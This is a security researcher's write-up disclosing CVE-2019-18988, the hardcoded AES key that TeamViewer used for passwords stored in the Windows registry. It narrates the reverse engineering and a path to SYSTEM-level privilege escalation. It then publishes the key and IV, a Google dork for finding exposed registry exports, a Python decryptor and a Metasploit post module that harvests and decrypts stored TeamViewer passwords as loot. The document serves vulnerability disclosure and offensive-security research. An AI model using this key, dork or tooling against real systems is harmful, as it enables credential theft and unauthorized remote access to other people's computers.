TeamViewer
Oh man where to even begin with this one. This was a crazy ride and I learned a ton along the way.
TL;DR: TeamViewer stored user passwords encrypted with AES-128-CBC with they key of 0602000000a400005253413100040000 and iv of 0100010067244F436E6762F25EA8D704 in the Windows registry. If the password is reused anywhere, privilege escalation is possible. If you do not have RDP rights to machine but TeamViewer is installed, you can use TeamViewer to remote in. TeamViewer also lets you copy data or schedule tasks to run through their Service, which runs as NT AUTHORITY\SYSTEM, so a low privilege user can immediately go to SYSTEM with a .bat file. This was assigned CVE-2019-18988.
I was on-site at a client and these guys were good. They fixed absolutely everything from the report last year. They were unaware of mimt6 and that’s how we started getting some hashes rolling in. After finally cracking one we quickly found out this place was very locked down. Even the network admin did not have local admin on any windows machines nor did they have RDP rights anywhere either. We were able to find a few open shares and connect to them. We came across a backup of TeamViewer registry keys. I noted in the backup there were things like OptionsPasswordAES or SecurityPasswordAES. I quickly looked up to see what I could do with this and I found out it’s not much. I could however import the registry settings or deploy them in a .msi so all the TeamViewer installs in the organization can have the same password. This lead me to believe there was a shared key across all TeamViewer which would backup the claim by the reg keys there is AES involved. In the end we were unable to compromise the client in time but the TeamViewer registry keys really stuck with me and thus begins this rabbit hole.
The first thing I did was try to find the installer for the exact same version from the TeamViewer registry keys which happened to be version 7. A quick google search shows TeamViewer kindly offers all old version for download still which can be found here. I setup a new Windows 10 VM and installed TeamViewer 7 on it. I played around with the settings and menus for a while. I imported the registry keys and was promptly locked out of the menu to change the options. It turns out the OptionsPasswordAES reg key is meant to keep unauthorized people out of the menu where you can change settings. I of course did not know the password and on a whim I downloaded BulletPassView from nirsoft and ran that. Surprisingly, it gave me back a password in plaintext. Excellent, now I can get back into the Options page and look at the Security part of the menu. I was hoping the predefined Unattended Access Password would show up in BulletPassView as well. It only showed up as asterisks. On the plane ride home from the client, I watched LiveOverflow’s video on Windows Game Hacking and how you can search through memory with Cheat Engine. So I download Cheat Engine to the VM and searched for the password I found earlier. There was one hit! I browsed that memory region and looked around. I discovered the Options Password is stored in cleartext in memory between the bytes 080088 and 000000000000. I kept looking around and then I found between 090088 and 000000000000 and this gave me the two different passwords for which I was looking! I decided to see how many people have poked at TeamViewer in the past and it turns out the clear text credentials in memory has already been found and assigned CVE-2018-14333. As it turns out there was a report on APT41 talking about how they attacked TeamViewer users or used TeamViewer to gain remote access to some users. The tweets were deleted but they can be seen here (Shout-out to the Internet Archive project and archive.is/archive.today).
After talking with some coworkers about looking for the key to decrypt future client passwords, @knavesec asked if my VM was connected to the internet. I said yes and then realized I need to test if the VM is downloading the AES key or if it is stored in the binary itself. I spun up a new Windows 10 VM, set the network to Host-Only mode, and copied the installer for TeamViewer over a HTTP server running on my host machine. I was in fact still able to see the passwords in plaintext. Now I needed to fire up IDA Pro and start reversing the massive binary that is TeamViewer. I spent weeks on this part. It got to the point I could tell if IDA was going to crash based on if it detected x-refs to a certain string in the binary. I was dumping memory in random places and running through each chunk of 32-bytes of memory at a time to see if I could luck onto the key. I was not able to and I chalked it up to using Python for the AES decryption and I noted there was the string Rijndael in TeamViewer so maybe they were using actual rijndael and not AES. I found out TeamViewer used Crypto++ for it’s encryption/decryption. As it turns out one of the supported modes in libcrypto++ was rijndael. I thought I was finally onto something. I used API Monitor to step through TeamViewer and Cheat Engine to search for the passwords and once they popped up in memory, I dump the processes memory using procdump and then ran through every single 32-byte chunk of memory as the key sliding by one byte at a time to ensure I hit every possible combination. Since I was now using C++ instead of python to do this, it went fairly quickly. However, it gave me nothing. (Spoiler alert: it may have but I was searching for the wrong thing.). I thought maybe procdump was compressing something so I learned how to dump memory using Frida and I ran through every possibility there as well, again with no luck. I decided to go back to reversing the binary.
I spent so long digging through the binary I knew there had to be a better way. I kept researching and researching and it turns out there is a large amount of people that want to find the assets AES keys for Unity games. This lead me to a blog post where I realized I was over thinking this and need to just use a debugger. After single stepping through TeamViewer for about 6 hours because I did not want to miss anything, I landed on the area of code that was responsible for the AES decryption. Here is a snippet from my notes.
=================================================
"ServerPasswordAES"=hex:88,44,d7,0a,b2,96,2a,3d,63,16,3c,ff,e4,15,04,fb
=================================================
Takes 8844d70ab2962a3d63163cffe41504fb into xmm0
Takes 5B659253E5E873D26723B7D5EAC06E3B into xmm1
pxor xmm0, xmm1
movdqa xmmword ptr ds:[eax],xmm0
[eax] = D3214559577E59EF04358B2A0ED56AC0
movdqa xmm1,xmmword ptr ds:[esi] | [esi] = 25C8C8BD4298BB32A57EECBDBD045BBB
movdqa xmm0,xmmword ptr ds:[eax] | [eax] = D3214559577E59EF04358B2A0ED56AC0
aesdec xmm0,xmm1 | One round of an AES decryption, using Equivalent Inverse Cipher, 128-bit data (state) from xmm1 with 128-bit round key from xmm2/m128; store the result in xmm1.
movdqa xmmword ptr ds:[eax],xmm0 | [eax] = 6F AA 98 76 DE 11 7D 8D 7E B6 EE 61 2D 3D 15 52
movdqa xmm1,xmmword ptr ds:[esi+10] | [esi+10]=[008FDE10]=79 DC 78 A6 67 50 73 8F E7 E6 57 8F 18 7A B7 06
add esi,20 |
dec ecx | ecx = 3
aesdec xmm0,xmm1 | do the actual decryption
movdqa xmmword ptr ds:[eax],xmm0 | [eax]=[008FDC90]=E3 58 26 46 A7 37 12 40 85 1C C0 43 7D 1F 1E 30
Three more rounds of aesdec then
aesdeclast xmm0, xmm1 .| Last round of AES decryption, using Equivalent Inverse Cipher, 128-bit data (state) from xmm2 with a 128-bit round key from xmm3/m128; store the result in xmm1.
008FDC90 01 00 01 00 67 24 4F 43 6E 67 62 F2 5E A8 D7 04 ....g$OCngbò^¨×.
This portion of code takes the bytes from the registry for ServerPasswordAES and then decrypts it with what appeared to be the key of 25C8C8BD4298BB32A57EECBDBD045BBB this is actually incorrect. I asked a wizard @ecdhe what they knew about implementations of AES in assembly and they responded too quickly saying “the IV is supposed to be XOR’d with the first 128bits of the plaintext only after the aesdec”. I realized I missed the movdqa into xmm2 and the pxor xmm0,xmm1 was not further obfuscation but rather the IV being used. I set a breakpoint to the beginning of the function and restarted the process. The mov into xmm2 was they key of 0602000000a400005253413100040000. The IV is the decrypted bytes of ServerPasswordAES with the previously mentioned key and a null IV. In this case, the IV for SecurityPasswordAES was 0100010067244F436E6762F25EA8D704. This works for TeamViewer Version 7 out of the box and on the latest version of Teamviewer 14 as long as the SecurityPasswordExported key is available. At the time of writing, I have not confirmed if it works on PermanentPassword which appears to be the Unattended Access Password for TeamViewer 14.
In TeamViewer 14, they introduced a scripting engine for their business customers. Shown below is the output of sc.exe qc TeamViewer7.
PS C:\Users\Administrator\Documents\testing> sc.exe qc TeamViewer7
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: TeamViewer7
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : TeamViewer 7
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Notice the last line in the output from tasklist /v. By having the password to a TeamViewer installation and the scripting engine enabled, you can escalate from a low privilege user to NT AUTHORITY\SYSTEM by only reading the registry.
PS C:\Users\Administrator\Documents\testing> tasklist /v
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ============================================
System Idle Process 0 Services 0 4 K Unknown NT AUTHORITY\SYSTEM 69:20:56 N/A
System 4 Services 0 144 K Unknown N/A 0:01:43 N/A
smss.exe 260 Services 0 1,264 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 376 Services 0 4,300 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
wininit.exe 444 Services 0 5,172 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
csrss.exe 452 Console 1 4,332 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
winlogon.exe 504 Console 1 8,364 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
services.exe 568 Services 0 7,368 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
lsass.exe 576 Services 0 21,076 K Unknown NT AUTHORITY\SYSTEM 0:05:14 N/A
svchost.exe 660 Services 0 20,084 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 712 Services 0 11,604 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:21 N/A
LogonUI.exe 812 Console 1 42,972 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
dwm.exe 820 Console 1 30,396 K Unknown Window Manager\DWM-1 0:00:00 N/A
svchost.exe 912 Services 0 78,452 K Unknown NT AUTHORITY\NETWORK SERVICE 0:07:20 N/A
svchost.exe 948 Services 0 27,564 K Unknown NT AUTHORITY\SYSTEM 0:00:18 N/A
svchost.exe 956 Services 0 19,964 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:03 N/A
svchost.exe 396 Services 0 17,756 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
svchost.exe 440 Services 0 9,608 K Unknown NT AUTHORITY\SYSTEM 0:00:35 N/A
svchost.exe 1060 Services 0 68,988 K Unknown NT AUTHORITY\SYSTEM 0:04:04 N/A
svchost.exe 1072 Services 0 27,036 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
VSSVC.exe 1188 Services 0 7,772 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1256 Services 0 23,948 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:33 N/A
svchost.exe 1268 Services 0 7,040 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
spoolsv.exe 1952 Services 0 24,168 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
svchost.exe 2032 Services 0 31,012 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
IpOverUsbSvc.exe 1172 Services 0 15,688 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
SolidCP.VmConfig.exe 1580 Services 0 36,636 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
TeamViewer_Service.exe 1908 Services 0 14,908 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
Since you stuck around this long, here is a Google dork to find some TeamViewer registry keys. Yes, you can decrypt them.
"SecurityPasswordAES" OR "OptionsPasswordAES" OR "SecurityPasswordExported" OR "PermanentPassword" filetype:reg
Timeline:
November 05th, 2019: Reach out to @TeamViewer_help on Twitter
November 05th, 2019: Send email to the Director of Security
November 14th, 2019: Request CVE based on precedent set by CVE-2014-1812
November 15th, 2019: Receive CVE-2019-18988
November 15th, 2019: Send email to Director of Security notifying them there is now a CVE assigned to this
November 18th, 2019: Receive first and only email back from vendor “We’re looking into it” email
January 13th, 2020: Status update request email sent to Director of Security
February 03rd, 2020: Publish writeup
See below for an implementation in Python as well as further below for a post metasploit module
import sys, hexdump, binascii
from Crypto.Cipher import AES
class AESCipher:
def __init__(self, key):
self.key = key
def decrypt(self, iv, data):
self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
return self.cipher.decrypt(data)
key = binascii.unhexlify("0602000000a400005253413100040000")
iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704")
hex_str_cipher = "d690a9d0a592327f99bb4c6a6b6d4cbe" # output from the registry
ciphertext = binascii.unhexlify(hex_str_cipher)
raw_un = AESCipher(key).decrypt(iv, ciphertext)
print(hexdump.hexdump(raw_un))
password = raw_un.decode('utf-16')
print(password)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
# @blurbdust based this code off of https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb
# and https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/enum_ms_product_keys.rb
##
class MetasploitModule < Msf::Post
include Msf::Post::Windows::Registry
def initialize(info={})
super(update_info(info,
'Name' => 'Windows Gather TeamViewer Passwords',
'Description' => %q{ This module will find and decrypt stored TeamViewer keys },
'License' => MSF_LICENSE,
'Author' => [ 'Nic Losby <blurbdust[at]gmail.com>'],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
def app_list
results = ""
keys = [
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version7", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version8", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version9", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version10", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version11", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version12", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version13", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version14", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version15", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer", "Version" ],
[ "HKLM\\SOFTWARE\\TeamViewer\\Temp", "SecurityPasswordExported" ],
[ "HKLM\\SOFTWARE\\TeamViewer", "Version" ],
]
keys.each do |keyx86|
#parent key
p = keyx86[0,1].join
#child key
c = keyx86[1,1].join
key = nil
keychunk = registry_getvaldata(p, c)
key = keychunk.unpack("C*") if not keychunk.nil?
optpass = registry_getvaldata(p, "OptionsPasswordAES")
secpass = registry_getvaldata(p, "SecurityPasswordAES")
secpasse = registry_getvaldata(p, "SecurityPasswordExported")
servpass = registry_getvaldata(p, "ServerPasswordAES")
proxpass = registry_getvaldata(p, "ProxyPasswordAES")
license = registry_getvaldata(p, "LicenseKeyAES")
if not optpass.nil?
decvalue = decrypt(optpass)
if not decvalue.nil?
print_good("Found Options Password: #{decvalue}")
results << "Options:#{decvalue}\n"
end
end
if not secpass.nil?
decvalue = decrypt(secpass)
if not decvalue.nil?
print_good("Found Security Password: #{decvalue}")
results << "Security:#{decvalue}\n"
end
end
if not secpasse.nil?
decvalue = decrypt(secpasse)
if not decvalue.nil?
print_good("Found Security Password Exported: #{decvalue}")
results << "SecurityE:#{decvalue}\n"
end
end
if not servpass.nil?
decvalue = decrypt(servpass)
if not decvalue.nil?
print_good("Found Server Password: #{decvalue}")
results << "Server:#{decvalue}\n"
end
end
if not proxpass.nil?
decvalue = decrypt(proxpass)
if not decvalue.nil?
print_good("Found Proxy Password: #{decvalue}")
results << "Proxy:#{decvalue}\n"
end
end
if not license.nil?
decvalue = decrypt(license)
if not decvalue.nil?
print_good("Found License Key: #{decvalue}")
results << "License:#{decvalue}\n"
end
end
end
#Only save data to disk when there's something in the table
if not results.empty?
path = store_loot("host.teamviewer_passwords", "text/plain", session, results, "teamviewer_passwords.txt", "TeamViewer Passwords")
print_good("Passwords stored in: #{path.to_s}")
end
end
def decrypt(encrypted_data)
password = ""
return password unless encrypted_data
password = ""
original_data = encrypted_data.dup
decoded = encrypted_data
#print_status(decoded)
key = "\x06\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x31\x00\x04\x00\x00"
iv = "\x01\x00\x01\x00\x67\x24\x4F\x43\x6E\x67\x62\xF2\x5E\xA8\xD7\x04"
aes = OpenSSL::Cipher.new("AES-128-CBC")
begin
aes.decrypt
aes.key = key
aes.iv = iv
plaintext = aes.update(decoded)
password = Rex::Text.to_ascii(plaintext, 'utf-16le')
if plaintext.empty?
return nil
end
rescue OpenSSL::Cipher::CipherError => e
puts "Unable to decode: \"#{encrypted_data}\" Exception: #{e}"
end
password
end
def run
print_status("Finding TeamViewer Passwords on #{sysinfo['Computer']}")
app_list
end
end